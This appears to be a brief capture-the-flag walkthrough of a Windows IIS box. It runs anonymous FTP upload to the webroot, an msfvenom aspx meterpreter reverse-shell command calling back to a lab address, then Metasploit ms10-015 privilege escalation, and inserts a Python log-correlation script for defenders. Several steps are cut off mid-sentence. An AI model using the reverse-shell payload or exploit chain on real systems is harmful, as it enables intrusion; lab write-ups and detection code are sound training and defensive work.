Port Scanning and General Enumeration (Nmap)
Initial scan shows ports 21 (FTP) and 80 (HTTP) open.
The scan also shows that anonymous FTP login is allowed, and the FTP root looks like the webroot.
Logging in to FTP with the creds anonymous:anonymous, we can put a file and see if we can access it from the browser. I wrote a simple htm file that says
Access (FTP, metasploit, msfvenom)
Things we know:
- We can access a file that we place on the FTP server
- We’re working with Microsoft IIS so we’ll probably need an asp or aspx file
Let’s craft some shellcode using msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4444 -f aspx > shell.aspx
Set up a listener in Metasploit and access our shell in the browser.
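From the defender's side, the sequence above (an anonymous FTP upload of an .aspx file, then an HTTP request for it) shows up when the IIS FTP and HTTP logs are correlated. The script below is an added example, not part of the original write-up; the log lines are constructed, and the column layout and the FTP-root-equals-webroot mapping are assumptions.

```python
# Added example (not from the original write-up): flag server-side script files
# uploaded over FTP and later requested over HTTP, using IIS W3C logs.
# Assumption: the FTP root is the web root, so both logs share cs-uri-stem paths.
SCRIPT_EXTS = (".asp", ".aspx", ".ashx", ".asmx")

# Constructed sample logs; only the columns named in '#Fields:' are assumed.
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-01-01 10:00:02 10.10.14.18 anonymous PASS - 230
2024-01-01 10:00:05 10.10.14.18 anonymous STOR /test.htm 226
2024-01-01 10:00:40 10.10.14.18 anonymous STOR /shell.aspx 226
"""
HTTP_LOG = """#Fields: date time cs-method cs-uri-stem c-ip sc-status
2024-01-01 10:00:10 GET /test.htm 10.10.14.18 200
2024-01-01 10:01:02 GET /shell.aspx 10.10.14.18 200
2024-01-01 10:01:30 GET /welcome.png 198.51.100.7 200
"""

def parse_w3c(text):
    """Yield one dict per record, taking column names from the '#Fields:' line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.strip() and not line.startswith("#"):
            values = line.split()
            if len(values) == len(fields):  # skip malformed or truncated rows
                yield dict(zip(fields, values))

def stamp(record):
    """ISO date and time strings sort chronologically, so a tuple is enough."""
    return (record.get("date", ""), record.get("time", ""))

def find_upload_then_request(ftp_log, http_log):
    """Return HTTP requests for script files that were stored over FTP earlier."""
    uploads = {}
    for r in parse_w3c(ftp_log):
        path = r.get("cs-uri-stem", "").lower()
        if (r.get("cs-method", "").upper() == "STOR"
                and r.get("sc-status") == "226" and path.endswith(SCRIPT_EXTS)):
            uploads.setdefault(path, r)  # keep the first successful upload
    hits = []
    for r in parse_w3c(http_log):
        up = uploads.get(r.get("cs-uri-stem", "").lower())
        if up and stamp(r) >= stamp(up):
            hits.append({"path": up["cs-uri-stem"], "ftp_user": up.get("cs-username"),
                         "ftp_ip": up.get("c-ip"), "uploaded": " ".join(stamp(up)),
                         "http_ip": r.get("c-ip"), "requested": " ".join(stamp(r))})
    return hits
```

On the sample logs this reports only /shell.aspx; the .htm upload is ignored because IIS does not execute it as a script.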
Privesc (metasploit, ms10-015)
Well, we’re on the box but as a low-privilege account. Let’s change that. Background the shell (bg) and:
Looks like there are a few we can try. Let’s try
Make sure your settings are correct and fire it off.
That’s a better account! Capture the flags.